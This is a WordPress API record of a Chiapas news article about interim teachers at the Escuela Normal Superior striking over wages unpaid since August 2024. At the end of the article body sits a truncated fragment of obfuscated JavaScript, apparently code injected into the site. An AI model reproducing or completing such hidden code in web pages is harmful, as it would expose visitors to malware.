{"id":22018,"date":"2025-05-21T03:49:47","date_gmt":"2025-05-21T03:49:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22018"},"modified":"2025-05-21T03:49:48","modified_gmt":"2025-05-21T03:49:48","slug":"entran-en-paro-docentes-interinos-de-la-normal-superior","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22018","title":{"rendered":"Entran en paro docentes interinos de la Normal Superior"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250520-WA0011-1024x766.jpg\" alt=\"\" class=\"wp-image-22019\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250520-WA0011-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250520-WA0011-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250520-WA0011-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250520-WA0011.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>20 de mayo del 2025. Tuxtla Guti\u00e9rrez.- A partir de este martes docentes interinos de la Escuela Normal Superior del Estado se declararon en paro laboral debido a la falta de pago de los salarios.<\/p>\n\n\n\n<p>Desde el mes de agosto del 2024 no se les ha pagado, a pesar de que han cumplido dando clases en esta instituci\u00f3n de manera puntual.<\/p>\n\n\n\n<p>\u201cDesde agosto del 2024 no nos han pagado, y lo que comprende febrero-abril del 2025, es el tiempo que nosotros estamos peleando ya que es un sueldo devengado\u201d, expresaron.<\/p>\n\n\n\n<p>Este grupo dio a conoce que desde octubre del 2024 se ha girado unas serie de oficios a la actual administraci\u00f3n estatal esperando una respuesta objetiva.<\/p>\n\n\n\n<p>Agregaron que: \u201cHasta el momento se han girado al menos cinco oficios, nos acercamos directamente con las instituciones correspondientes y la respuesta es \u00fanicamente dar largas\u201d.<\/p>\n\n\n\n<p>Consideran que tras haber acudido en diferentes ocaciones a la Secretar\u00eda de Educaci\u00f3n, no han tenido la oportunidad de hablar directamente con el titular de la dependencia para plantearle personalmente este problema.<\/p>\n\n\n\n<p>Hasta el d\u00eda de hoy la atenci\u00f3n por otros funcionarios no han sido m\u00e1s que medidas paliativas con palabras m\u00e1s, palabras menos de que en alg\u00fan momento ser\u00e1n atendidas sus demandas.<\/p>\n\n\n\n<p>\u201cPrimero nos dijeron que el pago estar\u00eda para febrero, luego que para el mes de marzo y as\u00ed ha pasado el tiempo sin cobrar cada uno su sueldo correspondiente\u201d, expresaron.<\/p>\n\n\n\n<p>Son 60 maestros que imparten en siete licenciaturas en esta normal los que est\u00e1n padeciendo esta situaci\u00f3n, y la deuda global es de dos millones y medio.<\/p>\n\n\n\n<p>\u201cNo hay un monto individual concreto ya que el suelo de cada docente depende de la carga horaria que le corresponde\u201d, se\u00f1alaron.<\/p>\n\n\n\n<p>Con esta medida de presi\u00f3n que est\u00e1n tomando los maestros interinos se est\u00e1n quedando sin clases 700 alumnos.<\/p>\n\n\n\n<p>00000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 20 de mayo del 2025. Tuxtla Guti\u00e9rrez.- A partir de este martes docentes interinos de la Escuela Normal Superior del Estado se declararon en paro laboral debido a la falta de pago de los salarios. Desde el mes de agosto del 2024 no se les ha pagado, a pesar de que han cumplido &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22019,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22018","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22018","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22018"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22018\/revisions"}],"predecessor-version":[{"id":22020,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22018\/revisions\/22020"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22019"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22018"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22018"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22018"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}